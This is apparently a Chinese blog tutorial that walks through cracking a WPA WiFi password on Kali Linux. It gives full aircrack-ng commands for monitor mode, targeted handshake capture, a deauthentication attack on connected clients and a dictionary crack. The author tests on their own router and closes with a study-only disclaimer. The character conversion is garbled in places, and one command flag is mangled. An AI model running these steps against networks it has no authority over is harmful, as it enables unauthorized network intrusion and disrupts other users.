WIFI破解前準備工作
- 一張支援Kali系統監聽的無線網卡
- VMware虛拟機安裝好Kali系統(本實驗用的是Kali 2022版本)
Kali系統下載下傳、安裝
官方網站:
https://www.kali.org/get-kali/#kali-installer-images
清華大學鏡像站:
https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2022.3
這裡推薦清華大學鏡像站下載下傳,下載下傳速度比較快,根據自己系統下載下傳對應版本即可,具體安裝教程可自行百度:
一、無線網卡安裝
無線網卡淘寶購買即可:搜尋Kali無線網卡,價格20-50元不等。購買前咨詢客服需要支援Kali系統的。将買回來的網卡插到PC的USB接口上,正常情況下虛拟機會識别無線網卡,在VMware虛拟機上檢視是否識别到無線網卡,如果沒有顯示網卡,可嘗試重新拔插無線網卡,還是不行則需要聯系賣家客服了。
進入到Kali系統,打開指令行終端,提升賬号權限
sudo su
檢視網卡是否安裝成功
airmon-ng
如果沒有顯示插入的無線網卡,請檢查無線網卡的連接配接是否正常!
二、啟動網卡監聽模式
airmon-ng start wlan0
檢視目前無線網卡的監聽模式是否正常開啟,網卡名稱變為網卡名+mon說明監聽正常
ifconfig
三、掃描WIFI
這裡我選擇自己的WIFI路由器進行破解,密碼是手機号碼
airodump-ng wlan0mon
四、等待抓取握手包
airodump-ng -w freedom -c 6 --bssid 28:D1:27:8C:C9:C5 wlan0mon -ignore-nefative-oneaa
參數說明:
# -c:指定信道
# -w:指定抓去握手包的存放位置或者名字,freedom是一會抓去的握手包的名字
# –bssid:指定路由器的MAC
執行完該指令,會顯示目前路由器正在連接配接的裝置,需要選擇其中一個裝置捕獲握手包
五、開始抓取握手包
打開另一個終端,選擇其中一個裝置捕獲握手包,有時可能捕獲不成功,可多次執行以下指令,確定能捕獲到握手包
sudo su
aireplay-ng -0 2 -a 28:D1:27:8C:C9:C5 -c A4:55:90:90:DB:B1 wlan0mon
再檢視第一個終端的狀态,如果顯示WPA handshake表明已經捕獲到握手包了,需要按Ctrl+C終止,終止後,會生成freedom-*.ivs的檔案
六、破解密碼
準備好破解的字典
字典其實是一個普通的文本文檔txt檔案,裡面存在着各種密碼,每個密碼用回車換行區分,破解程式在破解時會根據握手包的資料,與字典的每一個密碼一一比對,如果比對得上,則密碼可破解成功。
開始破解
aircrack-ng -w WIFI-Dict-955M.txt freedom-*.ivs
由于我使用的字典比較大,将近1GB的大小,破解需要很長的時間,為友善測試,可以自己建立一個測試的字典txt檔案,裡面填寫一個正确的WIFI密碼(前提是破解自己的WIFI),這樣即可很快、順利地破解。
七、密碼破解結果
WIFI-Dict-955M.txt這個字典跑了幾個小時也沒跑出來,這個字典不太行,我應該找個純數字或手機号碼的字典來跑。。。我換了一個自己測試寫的字典,把WIFI密碼填進去,不到1秒就出來了
破解成功,KEY FOUND!後面的就是WIFI的密碼
總結
- WIFI密碼不是百分百能破解成功的!
- WIFI密碼能否破解成功,取決于密碼字典是否足夠強大,如果字典沒有比對的密碼,無法破解成功
- WIFI密碼的破解效率取決于字典的大小、機器性能、WIFI密碼的複雜度等,字典越大,破解過程越久;機器性能強、WIFI密碼簡單則破解過程會快些。
提醒:本教程僅供網絡安全學習用途,不得用于對他人網絡裝置攻擊、破解、商業利用等。